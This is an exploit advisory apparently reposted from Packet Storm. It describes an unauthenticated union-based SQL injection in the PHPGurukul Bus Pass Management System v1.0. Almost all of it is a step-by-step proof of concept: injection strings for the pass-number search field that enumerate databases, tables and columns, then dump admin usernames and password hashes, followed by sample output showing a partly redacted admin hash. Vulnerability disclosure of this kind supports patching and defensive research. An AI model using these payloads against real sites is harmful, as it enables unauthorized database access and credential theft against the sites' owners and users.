## https://sploitus.com/exploit?id=PACKETSTORM:190359
# Exploit Title: Bus Pass Management System v1.0 - Unauthenticated
Union Based SQLi (Manuel Exploit)
# Date: 2025-04-07
# Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un
# Vendor: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql/
# Demo Site: http://localhost/buspassms/
# Tested on: Kali Linux
# CVE: N/A
PoC:
1. on the index page go to View Pass section
Search pass number with sqli payload
for listing databases
-------------------------------------------------------------------------------------
1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,schema_name FROM
information_schema.schemata-- -
-------------------------------------------------------------------------------------
for listing tables in the database:
-------------------------------------------------------------------------------------
1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,table_name FROM
information_schema.tables WHERE table_schema='buspassdb'-- -
-------------------------------------------------------------------------------------
for listing columns in the table
-------------------------------------------------------------------------------------
1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,column_name FROM
information_schema.columns WHERE table_name='tbladmin'-- -
-------------------------------------------------------------------------------------
dump all data in the table
-------------------------------------------------------------------------------------
1' UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(UserName,":",Password) FROM
buspassdb.tbladmin-- -
-------------------------------------------------------------------------------------
S.NO Pass Number Full Name Contact Number Email Creation Date Action
1 2 3 5 6 admin:f9[REDACTED]8a5733251